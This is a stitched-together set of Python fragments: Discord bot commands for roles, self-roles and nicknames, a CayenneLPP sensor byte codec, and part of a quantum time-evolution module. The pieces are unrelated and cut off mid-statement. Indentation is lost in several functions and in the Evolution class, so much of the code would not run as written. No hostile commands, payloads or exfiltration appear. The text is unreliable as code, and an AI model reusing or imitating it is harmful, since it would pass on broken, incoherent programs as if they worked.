                                        '`{0}roles <add/remove> [base role] [new role] [optional:"NoRole"]`\n'
                                        '`{0}roles <replace> [old role] [new role]`\n'
                                        '`{0}roles <create> [name] [color]`\n'
                                        'The roles command automates mass addition, removal and replacement of roles, '
                                        'as well as creation for custom colors.'
                                        'Example:\n'
                                        '`{0}roles add @SomeRole @OtherRole` will add `@OtherRole` to all users with '
                                        'role `@SomeRole`\n'
                                        'If the third argument "NoRole" is passed to `add/remove`, the second role '
                                        'will be added to/removed from only users with no role\n'
                                        'In `add/remove`, "base role" is used only to qualify, it will not be '
                                        'affected.\n'
                                        '*Note: make sure [base role] and [new role] are discord-formatted '
                                        'mentions*'.format(self.bot.command_prefix))
@self.bot.group(pass_context=True, aliases=['sroles', 'self-roles', 'selfrole'])
async def selfroles(ctx):
if not ctx.invoked_subcommand:
if not ctx.subcommand_passed:
await selfroles.get_command('listall').callback(ctx)
else:
arg = command_util.extract_passed(ctx, self.bot)
arg.replace('"', '')
await selfroles.get_command('add').callback(ctx, arg=arg)
@selfroles.command(pass_context=True)
@self.bot.test_high_perm
async def register(server, ctx, *, arg: str):
# final list of role objects to register
to_register = self.extract_roles(ctx, arg)
if not to_register:
await self.bot.say('Bad argument, pass one role or a list of comma-separated roles ❌')
return
for r in to_register: # type: discord.Role
server.selfroles.append(r.id)
storage.write_server_data(server)
if len(to_register) == 1:
await self.bot.say('Registered role **{}** to selfroles 📑'.format(to_register[0].name))
else:
await self.bot.say('Registered roles **{}** to selfroles 📑'
''.format(', '.join([r.name for r in to_register])))
@selfroles.command(pass_context=True)
@self.bot.test_high_perm
async def deregister(server, ctx, *, arg: str):
# final list of role objects to deregister
to_register = self.extract_roles(ctx, arg)
if not to_register:
await self.bot.say('Bad argument, pass one role or a list of comma-separated roles ❌')
return
for r in to_register: # type: discord.Role
server.selfroles.remove(r.id)
storage.write_server_data(server)
if len(to_register) == 1:
await self.bot.say('Deregistered role **{}** from selfroles 📑'.format(to_register[0].name))
else:
await self.bot.say('Deregistered roles **{}** from selfroles 📑'
''.format(', '.join([r.name for r in to_register])))
        @selfroles.command(pass_context=True, aliases=['list', 'l'])
        @self.bot.test_server
        async def listall(server, ctx):
            # Post an embed listing every self-assignable role registered for
            # this server, preferring mentions where the role is mentionable.
            if server.selfroles:
                # Drop stored ids that no longer resolve to a live role.
                valid_roles = [x for x in ctx.message.server.roles if x.id in server.selfroles]
                role_names = []
                for role in valid_roles:  # type: discord.Role
                    if role.mentionable:
                        role_names.append(role.mention)
                    else:
                        role_names.append('**{}**'.format(role.name))
            else:
                await self.bot.say('There are no selfroles in this server.')
                return
            em = discord.Embed(title=TITLE_BAR, color=0xb600ff,
                               description='Self-assignable roles:\n'
                                           '{}\n'
                                           'Use `{}selfroles <add/get> [role/comma-seperated list of roles]`'
                                           ''.format('\n'.join(role_names), self.bot.command_prefix))
            em.set_author(name='Selfroles', icon_url='https://abs.twimg.com/emoji/v2/72x72/1f4c3.png')  # curly page
            await self.bot.say(embed=em)
        @selfroles.command(pass_context=True, aliases=['get'])
        @self.bot.test_server
        async def add(server, ctx, *, arg):
            # Give the invoking user the requested self-assignable role(s).
            if not server.selfroles:
                await self.bot.say('Selfroles are not enabled for this server.')
                return
            extracted = self.extract_roles(ctx, arg)
            if not extracted:
                await self.bot.say('Bad argument, pass one role or a list of comma-separated roles ❌')
                return
            # Silently drop requested roles that are not on the selfrole list;
            # only complain when NOTHING valid remains.
            to_add = [x for x in extracted if x.id in server.selfroles]
            if to_add:
                try:
                    await self.bot.add_roles(ctx.message.author, *to_add)
                except discord.Forbidden:
                    await self.bot.say('I do not have permission to do this. ❌')
                    return
                except discord.HTTPException:
                    await self.bot.say('An unknown error occurred :( You could try again...')
                    return
                await self.bot.say('You now have roles: **{}** ✅'.format(', '.join([x.name for x in to_add])))
            else:
                await self.bot.say('Please choose from the list of selfroles. ❌')
        @selfroles.command(pass_context=True)
        @self.bot.test_server
        async def remove(server, ctx, *, arg):
            # Take the requested self-assignable role(s) away from the caller.
            if not server.selfroles:
                await self.bot.say('Selfroles are not enabled for this server.')
                return
            author = ctx.message.author
            extracted = self.extract_roles(ctx, arg)
            if not extracted:
                await self.bot.say('Bad argument, pass one role or a list of comma-separated roles ❌')
                return
            # Only registered selfroles that the caller actually holds count.
            to_remove = [x for x in extracted if x.id in server.selfroles and x in author.roles]
            if to_remove:
                try:
                    await self.bot.remove_roles(ctx.message.author, *to_remove)
                except discord.Forbidden:
                    await self.bot.say('I do not have permission to do this. ❌')
                    return
                except discord.HTTPException:
                    await self.bot.say('An unknown error occurred :( You could try again...')
                    return
                await self.bot.say('Removed the following roles: **{}** ✅'.format(', '.join([x.name for x in to_remove])))
            else:
                await self.bot.say('Please provide valid selfroles to remove. ❌')
        @self.bot.command(pass_context=True)
        async def getraw(ctx, arg: str, arg2: str = None):
            # Echo a message's raw (unrendered) content, useful for copying
            # `:id:`-formatted emoji.  Accepts a message id, a small history
            # offset, or a channel id + message id pair.
            if arg == 'help':
                await self.bot.send_message(ctx.message.author, '**Getraw help:**\n'
                                                                '`{0}getraw [message id]`\n'
                                                                '`{0}getraw [channel id] [message id]`\n'
                                                                'Returns the raw string from a message. Useful '
                                                                'to capture `:id:` formatted emoji. If `channel_id` '
                                                                'is not provided, current channel will be used.'
                                                                ''.format(self.bot.command_prefix))
                return
            if not is_num(arg):
                return
            try:
                msg = None
                if arg2:
                    # Two args: `arg` is a channel id, `arg2` the message id.
                    msg = await self.bot.get_message(self.bot.get_channel(arg), arg2)
                else:
                    m_count = int(arg)
                    if m_count <= 30:
                        # Small numbers are treated as an offset into recent
                        # channel history rather than a message id (real ids
                        # are large snowflakes, so no ambiguity in practice).
                        i = 0
                        async for m in self.bot.logs_from(ctx.message.channel, limit=30):
                            if i >= m_count:
                                msg = m
                                break
                            i += 1
                    else:
                        msg = await self.bot.get_message(ctx.message.channel, arg)
                if not msg:
                    await self.bot.say('Message not found.')
                    return
                await self.bot.say('```\n{}\n```'.format(msg.content))
            except discord.Forbidden:
                await self.bot.say("I don't have permission for that")
        @self.bot.command(pass_context=True, aliases=['nickall', 'nick-all'])
        @self.bot.test_high_perm
        async def nick_all(server, ctx, new_name: str):
            # Bulk-set (or reset) every member's nickname on the server.
            # NOTE(review): '<PASSWORD>' looks like a redacted hard-coded user
            # id; this branch only pranks that one caller ("haha jk") and
            # never changes any nicknames.
            if ctx.message.author.id == '<PASSWORD>':
                if new_name == 'reset':
                    await self.bot.say('Resetting all nicknames...')
                else:
                    await self.bot.say('Setting all nicknames to `{}`'.format(new_name))
                await asyncio.sleep(5)
                await self.bot.send_message(ctx.message.channel, 'haha jk')
                return
            # The literal argument 'reset' clears nicknames (None = reset).
            if new_name == 'reset':
                new_name = None
                await self.bot.say('Resetting all nicknames...')
            else:
                await self.bot.say('Setting all nicknames to `{}`'.format(new_name))
            failures = []
            # Best effort: collect members whose nickname could not be
            # changed (missing permission / transient API error) and report
            # them at the end instead of aborting mid-run.
            for m in ctx.message.server.members:
                try:
                    await self.bot.change_nickname(m, new_name)
                except discord.Forbidden:
                    failures.append(m)
                except discord.HTTPException:
                    failures.append(m)
            if len(failures) > 0:
                await self.bot.say(
                    'Operation complete. Failed to change: {}'.format(', '.join([x.name for x in failures])))
@self.bot.command(pass_context=True, aliases=['nick'])
@self.bot.test_server
async def nickname(server, ctx, member: discord.Member, new_name: str):
author = ctx.message.author
if not author.server_permissions.change_nickname():
await self.bot.say('You do not have permission to change your nickname.', delete=5)
return
if author != member and not author.server_permissions.manage_nicknames():
await self.bot.say('You do not have permission to change others\' nicknames.', delete=5)
return
if author != member and author.server_permissions < member.server_permissions:
await self.bot.say('You do not have permission to change {}\'s nickname.'.format(member.name),
delete=5)
return
if new_name.lower() in ['reset', 'revert', 'clear', 'original']:
new_name = None
try:
await self.bot.change_nickname(member, new_name)
except discord.Forbidden:
await self.bot.say('I do not have permission to do this. ❌')
return
except discord.HTTPException:
await self.bot.say('An unknown error occurred :( You could try again...')
return
# |
try:
    import logging
except ImportError:
    # Minimal stand-in so the lpp_* codecs can call logging unconditionally
    # on stripped-down interpreters without the stdlib logging module.
    class logging:
        """No-op shim mirroring the stdlib logging calls used in this module."""
        # staticmethod so `logging.debug(...)` works unbound on the class
        # (the original instance-method signature only worked by accident,
        # with the message swallowed as `self`).
        @staticmethod
        def debug(*args, **kwargs):
            pass
        # BUG FIX: the original shim lacked `error`, so the voltage codecs
        # (which call logging.error on negative values) raised
        # AttributeError on the fallback path.
        @staticmethod
        def error(*args, **kwargs):
            pass
def __assert_data_tuple(data, num):
    """Internal helper: coerce `data` to a tuple and assert its length.
    A bare (non-tuple) value is wrapped into a 1-tuple first; raises
    AssertionError when the resulting length differs from `num`.
    """
    coerced = data if isinstance(data, tuple) else (data,)
    if len(coerced) != num:
        raise AssertionError()
    return coerced
def __from_bytes(buf, buflen):
    """Internal helper: parse a big-endian unsigned integer from `buf`.
    Raises AssertionError when `buf` is not exactly `buflen` bytes long.
    """
    logging.debug("  in: bytes = %s, length = %d", buf, len(buf))
    if len(buf) != buflen:
        raise AssertionError()
    val = 0
    # Accumulate most-significant byte first (big-endian).
    for byte in buf:
        val = (val << 8) | byte
    logging.debug("  out: value = %d", val)
    return val
def __to_bytes(val, buflen):
    """Internal helper: serialize `val` big-endian into `buflen` bytes.
    Each output byte is masked with 0xff, so negative or oversized values
    are reduced modulo 2**(8*buflen) (two's-complement byte pattern).
    """
    logging.debug("  in: value = %d", val)
    buf = bytearray(
        (val >> (8 * (buflen - 1 - pos))) & 0xff for pos in range(buflen))
    logging.debug("  out: bytes = %s, length = %d", buf, len(buf))
    return buf
def __to_signed(val, bits):
    """Internal helper: reinterpret an unsigned value as `bits`-bit signed.
    Values at or above 2**(bits-1) are mapped to their negative
    two's-complement counterpart.
    """
    logging.debug("  in: value = %d", val)
    # All-ones mask over the whole bytes covered by `bits`
    # (equivalent to the original OR-loop over 0xff chunks).
    mask = (1 << (int(bits / 8) * 8)) - 1
    if val >= (1 << (bits - 1)):
        val = -1 - (val ^ mask)
    logging.debug("  out: value = %d", val)
    return val
def __to_s16(val):
    # Reinterpret a 16-bit unsigned value as signed (two's complement).
    return __to_signed(val, 16)
def __to_s24(val):
    # Reinterpret a 24-bit unsigned value as signed (two's complement).
    return __to_signed(val, 24)
def __to_unsigned(val):
    """Convert signed (2 complement) value to unsigned."""
    # NOTE(review): with Python's arbitrary-precision ints, ~(-val - 1) == val,
    # so this function is effectively the identity.  The actual byte-level
    # two's-complement encoding comes from the `& 0xff` masking in
    # __to_bytes; this helper is kept for intent/documentation.
    if val < 0:
        val = ~(-val - 1)
    return val
def lpp_digital_io_from_bytes(buf):
    """Decode a digital input/output channel from `buf` into a 1-tuple."""
    logging.debug("lpp_digital_io_from_bytes")
    return (__from_bytes(buf, 1),)
def lpp_digital_io_to_bytes(data):
    """Encode a digital input/output channel as a single-byte buffer."""
    logging.debug("lpp_digital_io_to_bytes")
    (value,) = __assert_data_tuple(data, 1)
    return __to_bytes(value, 1)
def lpp_voltage_from_bytes(buf):
    """Decode a voltage reading (hundredths resolution) from `buf`.
    Raises AssertionError for raw values with the sign bit set, since
    negative voltages are not representable in this channel type.
    """
    logging.debug("lpp_voltage_from_bytes")
    raw = __from_bytes(buf, 2)
    if raw >= (1 << 15):
        logging.error("Negative Voltage value is not allowed")
        raise AssertionError("Negative values are not allowed.")
    volts = raw / 100.0
    logging.debug("  out: value = %f", volts)
    return (volts,)
def lpp_voltage_to_bytes(data):
    """Encode a non-negative voltage (hundredths resolution) into 2 bytes."""
    logging.debug("lpp_voltage_to_bytes")
    (volts,) = __assert_data_tuple(data, 1)
    if volts < 0:
        logging.error("Negative Voltage value is not allowed")
        raise AssertionError("Negative values are not allowed")
    logging.debug("  in: value = %f", volts)
    return __to_bytes(int(volts * 100), 2)
def lpp_analog_io_from_bytes(buf):
    """Decode a signed analog in/output value (hundredths) from `buf`."""
    logging.debug("lpp_analog_io_from_bytes")
    raw = __to_s16(__from_bytes(buf, 2))
    value = raw / 100.0
    logging.debug("  out: value = %f", value)
    return (value,)
def lpp_analog_io_to_bytes(data):
    """Encode a signed analog in/output value (hundredths) into 2 bytes."""
    logging.debug("lpp_analog_io_to_bytes")
    (value,) = __assert_data_tuple(data, 1)
    logging.debug("  in: value = %f", value)
    scaled = int(value * 100)
    logging.debug("  in: value = %d", scaled)
    return __to_bytes(__to_unsigned(scaled), 2)
def lpp_generic_from_bytes(buf):
    """Decode a generic 4-byte unsigned integer from `buf` into a 1-tuple."""
    logging.debug("lpp_generic_from_bytes")
    return (__from_bytes(buf, 4),)
def lpp_generic_to_bytes(data):
    """Encode an unsigned integer (< 2**32) into a 4-byte buffer.
    Raises ValueError for negative values or values too wide for 4 bytes.
    """
    logging.debug("lpp_generic_to_bytes")
    (raw,) = __assert_data_tuple(data, 1)
    raw = int(raw)
    logging.debug("  in: value = %i", raw)
    if raw < 0:
        raise ValueError("Negative values are not allowed")
    if raw >= (1 << 32):
        raise ValueError("Values larger than 4294967295 are not allowed")
    return __to_bytes(raw, 4)
def lpp_unix_time_from_bytes(buf):
    """Decode a 4-byte unix timestamp from `buf`.
    Raises ValueError for raw values with the sign bit set (a negative
    timestamp is not meaningful here).
    """
    logging.debug("lpp_unix_time_from_bytes")
    timestamp = __from_bytes(buf, 4)
    if timestamp >= (1 << 31):
        raise ValueError("Unix timestamp can not be negative.")
    return (timestamp,)
def lpp_unix_time_to_bytes(data):
    """Encode 4 byte unix timestamp into CayenneLpp and return byte buffer.
    Raises ValueError for negative timestamps or values that do not fit
    into 4 bytes.
    """
    logging.debug("lpp_unix_time_to_bytes")
    data = __assert_data_tuple(data, 1)
    val_i = int(data[0])
    logging.debug("  in: value = %i", val_i)
    if val_i < 0:
        raise ValueError("Negative values are not allowed")
    # FIX: mirror lpp_generic_to_bytes and reject values wider than the
    # 4-byte field; previously such values were silently wrapped by the
    # byte masking in __to_bytes, producing a garbled timestamp.
    if val_i >= (1 << 32):
        raise ValueError("Values larger than 4294967295 are not allowed")
    return __to_bytes(val_i, 4)
def lpp_illuminance_from_bytes(buf):
    """Decode an unsigned 2-byte illuminance reading from `buf`."""
    logging.debug("lpp_illuminance_from_bytes")
    return (int(__from_bytes(buf, 2)),)
def lpp_illuminance_to_bytes(data):
    """Encode a non-negative illuminance reading into 2 bytes."""
    logging.debug("lpp_illuminance_to_bytes")
    (lux,) = __assert_data_tuple(data, 1)
    lux = int(lux)
    if lux < 0:
        raise ValueError("Illuminance sensor values must be positive!")
    return __to_bytes(lux, 2)
def lpp_presence_from_bytes(buf):
    """Decode a single-byte presence value from `buf` into a 1-tuple."""
    logging.debug("lpp_presence_from_bytes")
    return (__from_bytes(buf, 1),)
def lpp_presence_to_bytes(data):
    """Encode a non-negative presence value into a single byte."""
    logging.debug("lpp_presence_to_bytes")
    (flag,) = __assert_data_tuple(data, 1)
    flag = int(flag)
    if flag < 0:
        raise ValueError("Presence sensor values must be positive!")
    return __to_bytes(flag, 1)
def lpp_temperature_from_bytes(buf):
    """Decode a signed temperature (tenths resolution) from `buf`."""
    logging.debug("lpp_temperature_from_bytes")
    raw = __to_s16(__from_bytes(buf, 2))
    value = raw / 10.0
    logging.debug("  out: value = %f", value)
    return (value,)
def lpp_temperature_to_bytes(data):
    """Encode a signed temperature (tenths resolution) into 2 bytes."""
    logging.debug("lpp_temperature_to_bytes")
    (value,) = __assert_data_tuple(data, 1)
    logging.debug("  in: value = %f", value)
    scaled = int(value * 10)
    logging.debug("  in: value = %d", scaled)
    return __to_bytes(__to_unsigned(scaled), 2)
def lpp_humidity_from_bytes(buf):
    """Decode relative humidity (half-unit resolution) from `buf`."""
    logging.debug("lpp_humidity_from_bytes")
    percent = __from_bytes(buf, 1) / 2.0
    logging.debug("  out: value = %f", percent)
    return (percent,)
def lpp_humidity_to_bytes(data):
    """Encode non-negative relative humidity (half-unit resolution) into 1 byte."""
    logging.debug("lpp_humidity_to_bytes")
    (percent,) = __assert_data_tuple(data, 1)
    logging.debug("  in: value = %f", percent)
    scaled = int(percent * 2)
    if scaled < 0:
        raise ValueError("Humidity sensor values must be positive!")
    return __to_bytes(scaled, 1)
def lpp_accel_from_bytes(buf):
    """Decode a 3-axis accelerometer sample (scaled by 1/1000) from `buf`.
    Expects exactly 6 bytes: three big-endian signed 16-bit values (x, y, z).
    """
    logging.debug("lpp_accel_from_bytes")
    logging.debug("  in: bytes = %s, length = %d", buf, len(buf))
    if len(buf) != 6:
        raise AssertionError()
    raw = [__from_bytes(buf[i:i + 2], 2) for i in (0, 2, 4)]
    logging.debug("  out: x = %d, y = %d, z = %d", raw[0], raw[1], raw[2])
    raw = [__to_s16(v) for v in raw]
    logging.debug("  out: x = %d, y = %d, z = %d", raw[0], raw[1], raw[2])
    x, y, z = (v / 1000.0 for v in raw)
    logging.debug("  out: x = %f, y = %f, z = %f", x, y, z)
    return (x, y, z,)
def lpp_accel_to_bytes(data):
    """Encode a 3-axis accelerometer sample (scaled by 1000) into 6 bytes."""
    logging.debug("lpp_accel_to_bytes")
    x, y, z = __assert_data_tuple(data, 3)
    logging.debug("  in: x = %f, y = %f, z = %f", x, y, z)
    scaled = [int(v * 1000) for v in (x, y, z)]
    logging.debug("  in: x = %d, y = %d, z = %d", scaled[0], scaled[1], scaled[2])
    scaled = [__to_unsigned(v) for v in scaled]
    logging.debug("  in: x = %d, y = %d, z = %d", scaled[0], scaled[1], scaled[2])
    buf = bytearray(6)
    # Pack each axis as a big-endian 16-bit field.
    for idx, v in enumerate(scaled):
        buf[idx * 2:idx * 2 + 2] = __to_bytes(v, 2)
    logging.debug("  out: bytes = %s, length = %d", buf, len(buf))
    return buf
def lpp_baro_from_bytes(buf):
    """Decode an unsigned barometer reading (tenths resolution) from `buf`."""
    logging.debug("lpp_baro_from_bytes")
    pressure = __from_bytes(buf, 2) / 10.0
    logging.debug("  out: value = %f", pressure)
    return (pressure,)
def lpp_baro_to_bytes(data):
    """Encode a non-negative barometer reading (tenths resolution) into 2 bytes."""
    logging.debug("lpp_baro_to_bytes")
    (pressure,) = __assert_data_tuple(data, 1)
    logging.debug("  in: value = %f", pressure)
    scaled = int(pressure * 10)
    if scaled < 0:
        raise ValueError("Barometer sensor values must be positive!")
    return __to_bytes(scaled, 2)
def lpp_gyro_from_bytes(buf):
    """Decode a 3-axis gyrometer sample (scaled by 1/100) from `buf`.
    Expects exactly 6 bytes: three big-endian signed 16-bit values (x, y, z).
    """
    logging.debug("lpp_gyro_from_bytes")
    logging.debug("  in: bytes = %s, length = %d", buf, len(buf))
    if len(buf) != 6:
        raise AssertionError()
    raw = [__from_bytes(buf[i:i + 2], 2) for i in (0, 2, 4)]
    logging.debug("  out: x = %d, y = %d, z = %d", raw[0], raw[1], raw[2])
    raw = [__to_s16(v) for v in raw]
    logging.debug("  out: x = %d, y = %d, z = %d", raw[0], raw[1], raw[2])
    x, y, z = (v / 100.0 for v in raw)
    logging.debug("  out: x = %f, y = %f, z = %f", x, y, z)
    return (x, y, z,)
def lpp_gyro_to_bytes(data):
"""Encode gyrometer data into CayenneLPP and return byte buffer."""
logging.debug("lpp_gyro_to_bytes")
data = __assert_data_tuple(data, 3)
val_x = data[0]
val_y = data[1]
val_z = data[2]
logging.debug(" in: x = %f, y = %f, z = %f", val_x, val_y, val_z)
val_xi | |
"""Easy and efficient time evolutions.
Contains an evolution class, Evolution to easily and efficiently manage time
evolution of quantum states according to the Schrodinger equation,
and related functions.
"""
import functools
import numpy as np
from scipy.integrate import complex_ode
from .core import (qarray, isop, ldmul, rdmul, explt,
dot, issparse, qu, eye, dag)
from .linalg.base_linalg import eigh, norm, expm_multiply
from .utils import continuous_progbar, progbar
# --------------------------------------------------------------------------- #
# Quantum evolution equations #
# --------------------------------------------------------------------------- #
#
# These are mostly just to be used internally with the integrators
def schrodinger_eq_ket(ham):
    """Wavefunction schrodinger equation.
    Parameters
    ----------
    ham : operator
        Time-independant Hamiltonian governing evolution.
    Returns
    -------
    psi_dot(t, y) : callable
        Function to calculate psi_dot(t) at psi(t).
    """
    def psi_dot(_, y):
        # d|psi>/dt = -i H |psi>; the time argument is ignored since H is
        # time-independent.
        return -1.0j * dot(ham, y)
    return psi_dot
def schrodinger_eq_dop(ham):
    """Density operator schrodinger equation, but with flattened input/output.
    Note that this assumes both `ham` and `rho` are hermitian in order to speed
    up the commutator, non-hermitian hamiltonians as used to model loss should
    be treated explicitly or with `schrodinger_eq_dop_vectorized`.
    Parameters
    ----------
    ham : operator
        Time-independant Hamiltonian governing evolution.
    Returns
    -------
    rho_dot(t, y) : callable
        Function to calculate rho_dot(t) at rho(t), input and
        output both in ravelled (1D form).
    """
    dim = ham.shape[0]
    def rho_dot(_, y):
        # For hermitian H and rho: [H, rho] = H rho - (H rho)^dagger.
        h_rho = dot(ham, y.reshape(dim, dim))
        return (-1.0j * (h_rho - h_rho.T.conj())).reshape(-1)
    return rho_dot
def schrodinger_eq_dop_vectorized(ham):
    """Density operator schrodinger equation in vectorised superoperator form.
    The propagator is pre-built as a single superoperator so no per-step
    reshaping is required; this is probably only more efficient for sparse
    Hamiltonians.
    Parameters
    ----------
    ham: time-independant hamiltonian governing evolution
    Returns
    -------
    rho_dot(t, y) : callable
        Function to calculate rho_dot(t) at rho(t), input and
        output both in ravelled (1D form).
    """
    dim = ham.shape[0]
    identity = eye(dim, sparse=issparse(ham))
    # vec(-i [H, rho]) = -i (H (x) I - I (x) H^T) vec(rho)
    superop = -1.0j * ((ham & identity) - (identity & ham.T))
    def rho_dot(_, y):
        return dot(superop, y)
    return rho_dot
def lindblad_eq(ham, ls, gamma):
    """Lindblad equation, but with flattened input/output.
    Parameters
    ----------
    ham : operator
        Time-independant hamiltonian governing evolution.
    ls : sequence of matrices
        Lindblad operators.
    gamma : float
        Dampening strength.
    Returns
    -------
    rho_dot(t, y) : callable
        Function to calculate rho_dot(t) at rho(t), input and
        output both in ravelled (1D form).
    """
    d = ham.shape[0]
    # Precompute L^dagger L for each lindblad operator once, since they are
    # reused at every integration step.
    lls = tuple(dot(dag(l), l) for l in ls)
    def gen_l_terms(rho):
        # Dissipator terms: L rho L^dagger - (1/2) {L^dagger L, rho}.
        for l, ll in zip(ls, lls):
            yield (dot(l, dot(rho, dag(l))) -
                   0.5 * (dot(rho, ll) + dot(ll, rho)))
    def rho_dot(_, y):
        rho = y.reshape(d, d)
        # Unitary part -i[H, rho], built with in-place ops to avoid copies;
        # the statement order here is load-bearing.
        rho_d = dot(ham, rho)
        rho_d -= rho_d.T.conj()
        rho_d *= -1.0j
        rho_d += gamma * sum(gen_l_terms(rho))
        return np.asarray(rho_d).reshape(-1)
    return rho_dot
def lindblad_eq_vectorized(ham, ls, gamma, sparse=False):
    """Lindblad equation, but with flattened input/output and vectorised
    superoperation mode (no reshaping required).
    Parameters
    ----------
    ham : operator
        Time-independant hamiltonian governing evolution.
    ls : sequence of matrices
        Lindblad operators.
    gamma : float
        Dampening strength.
    sparse : bool, optional
        Whether to force a sparse identity when building the superoperator.
    Returns
    -------
    rho_dot(t, y) : callable
        Function to calculate rho_dot(t) at rho(t), input and
        output both in ravelled (1D form).
    """
    d = ham.shape[0]
    ham_sparse = issparse(ham) or sparse
    idt = eye(d, sparse=ham_sparse)
    # Unitary part as a superoperator: vec(-i[H, rho]).
    evo_superop = -1.0j * ((ham & idt) - (idt & ham.T))
    def gen_lb_terms():
        # Vectorised dissipator for each lindblad operator; the identity is
        # rebuilt per-operator so sparsity can follow each L individually.
        for l in ls:
            lb_sparse = issparse(l) or sparse
            idt = eye(d, sparse=lb_sparse)
            yield ((l & l.conj()) - 0.5 * ((idt & dot(dag(l), l).T) +
                                           (dot(dag(l), l) & idt)))
    evo_superop += gamma * sum(gen_lb_terms())
    def rho_dot(_, y):
        return dot(evo_superop, y)
    return rho_dot
def _calc_evo_eq(isdop, issparse, isopen=False):
    """Choose an appropriate dynamical equation to evolve with.
    """
    # Keyed on (isdop, issparse, isopen).  Combinations missing from the
    # table (e.g. an open-system ket evolution) deliberately raise KeyError.
    eq_chooser = {
        (0, 0, 0): schrodinger_eq_ket,
        (0, 1, 0): schrodinger_eq_ket,
        (1, 0, 0): schrodinger_eq_dop,
        (1, 1, 0): schrodinger_eq_dop_vectorized,
        (1, 0, 1): lindblad_eq,
        (1, 1, 1): lindblad_eq_vectorized,
    }
    return eq_chooser[(isdop, issparse, isopen)]
# --------------------------------------------------------------------------- #
# Quantum Evolution Class #
# --------------------------------------------------------------------------- #
class Evolution(object):
"""A class for evolving quantum systems according to Schrodinger equation.
The evolution can be performed in a number of ways:
- diagonalise the Hamiltonian (or use already diagonalised system).
- integrate the complex ODE, that is, the Schrodinger equation, using
scipy. Here either a mid- or high-order Dormand-Prince adaptive
time stepping scheme is used (see
:class:`scipy.integrate.complex_ode`).
Parameters
----------
p0 : quantum state
Inital state, either vector or operator. If vector, converted to ket.
ham : operator, or tuple (1d array, operator).
Governing Hamiltonian, if tuple then assumed to contain
``(eigvals, eigvecs)`` of presolved system.
t0 : float, optional
Initial time (i.e. time of state ``p0``), defaults to zero.
compute : callable, or dict of callable, optional
Function(s) to compute on the state at each time step, called
with args (t, pt). If supplied with:
- single callable : ``Evolution.results`` will contain the results
as a list,
- dict of callables : ``Evolution.results`` will contain the
results as a dict of lists with corresponding keys to those
given in ``compute``.
method : {'integrate', 'solve', 'expm'}
How to evolve the system:
- ``'integrate'``: use definite integration. Get system at each
time step, only need action of Hamiltonian on state. Generally
efficient.
- ``'solve'``: diagonalise dense hamiltonian. Best for small
systems and allows arbitrary time steps without loss of
precision.
- ``'expm'``: compute the evolved state using the action of the
operator exponential in a 'single shot' style. Only needs action
of Hamiltonian, for very large systems can use distributed MPI.
int_small_step : bool, optional
If ``method='integrate'``, whether to use a low or high order
integrator to give naturally small or large steps.
expm_backend : {'auto', 'scipy', 'slepc'}
How to perform the expm_multiply function if ``method='expm'``. Can
further specifiy ``'slepc-krylov'``, or ``'slepc-expokit'``.
expm_opts : dict
Supplied to :func:`~quimb.linalg.base_linalg.expm_multiply`
function if ``method='expm'``.
progbar : bool, optional
Whether to show a progress bar when calling ``at_times`` or integrating
with the ``update_to`` method.
"""
    def __init__(self, p0, ham, t0=0,
                 compute=None,
                 method='integrate',
                 int_small_step=False,
                 expm_backend='AUTO',
                 expm_opts=None,
                 progbar=False):
        # NOTE(review): the default is 'AUTO' while the class docstring lists
        # {'auto', 'scipy', 'slepc'} -- presumably matched case-insensitively
        # downstream; confirm before relying on exact casing.
        self._p0 = qu(p0)
        self._t = self.t0 = t0
        self._isdop = isop(self._p0)  # Density operator evolution?
        self._d = p0.shape[0]  # Hilbert space dimension
        self._progbar = progbar
        self._setup_callback(compute)
        self._method = method
        # A pre-diagonalised (eigvals, eigvecs) tuple forces the 'solve'
        # path regardless of the requested method.
        if method == 'solve' or isinstance(ham, (tuple, list)):
            self._solve_ham(ham)
        elif method == 'integrate':
            self._start_integrator(ham, int_small_step)
        elif method == 'expm':
            # 'Single shot' evolution: just record the hamiltonian and
            # backend options; expm_multiply is applied on demand.
            self._update_method = self._update_to_expm_ket
            self._pt = self._p0
            self.ham = ham
            self.expm_backend = expm_backend
            self.expm_opts = {} if expm_opts is None else dict(expm_opts)
        else:
            raise ValueError("Did not understand evolution method: '{}'."
                             .format(method))
    def _setup_callback(self, fn):
        """Setup callbacks in the correct place to compute into _results
        """
        # Two flavours are kept: `step_callback` receives the state already
        # in quantum (column) form, while `int_step_callback` receives the
        # integrator's flat ndarray and must reshape it first.
        if fn is None:
            step_callback = None
            # NOTE(review): when a progress bar is requested a no-op solout
            # is still installed on the integrator -- presumably so it
            # reports every internal step; confirm against `update_to`.
            if not self._progbar:
                int_step_callback = None
            else:
                def int_step_callback(t, y):
                    pass
        # dict of funcs input -> dict of funcs output
        elif isinstance(fn, dict):
            self._results = {k: [] for k in fn}
            @functools.wraps(fn)
            def step_callback(t, pt):
                for k, v in fn.items():
                    self._results[k].append(v(t, pt))
            # For the integration callback, additionally need to convert
            # back to 'quantum' (column vector) form
            @functools.wraps(fn)
            def int_step_callback(t, y):
                pt = qarray(y.reshape(self._d, -1))
                for k, v in fn.items():
                    self._results[k].append(v(t, pt))
        # else results -> single list of outputs of fn
        else:
            self._results = []
            @functools.wraps(fn)
            def step_callback(t, pt):
                self._results.append(fn(t, pt))
            @functools.wraps(fn)
            def int_step_callback(t, y):
                pt = qarray(y.reshape(self._d, -1))
                self._results.append(fn(t, pt))
        self._step_callback = step_callback
        self._int_step_callback = int_step_callback
    def _solve_ham(self, ham):
        """Solve the supplied hamiltonian and find the initial state in the
        energy eigenbasis for quick evolution later.
        """
        # See if already solved from tuple
        try:
            # A (eigvals, eigvecs) pair unpacks cleanly; anything else
            # (e.g. a dense operator) raises ValueError and is diagonalised.
            self._evals, self._evecs = ham
            self._method = 'solve'
        except ValueError:
            self._evals, self._evecs = eigh(ham.A)
        # Find initial state in energy eigenbasis at t0
        if self._isdop:
            # rho in the energy basis: V^dagger rho V
            self.pe0 = dot(dag(self._evecs), dot(self._p0, self._evecs))
            self._update_method = self._update_to_solved_dop
        else:
            # |psi> in the energy basis: V^dagger |psi>
            self.pe0 = dot(dag(self._evecs), self._p0)
            self._update_method = self._update_to_solved_ket
        # Current state (start with same as initial)
        self._pt = self._p0
        self._solved = True
    def _start_integrator(self, ham, small_step):
        """Initialize a stepping integrator.
        """
        self._sparse_ham = issparse(ham)
        # set complex ode with governing equation
        evo_eq = _calc_evo_eq(self._isdop, self._sparse_ham)
        self._stepper = complex_ode(evo_eq(ham))
        # 5th order stepper (dopri5) or 8th order stepper (dop853); the
        # divisor sets the first step size relative to the hamiltonian's
        # frobenius norm (an energy scale).
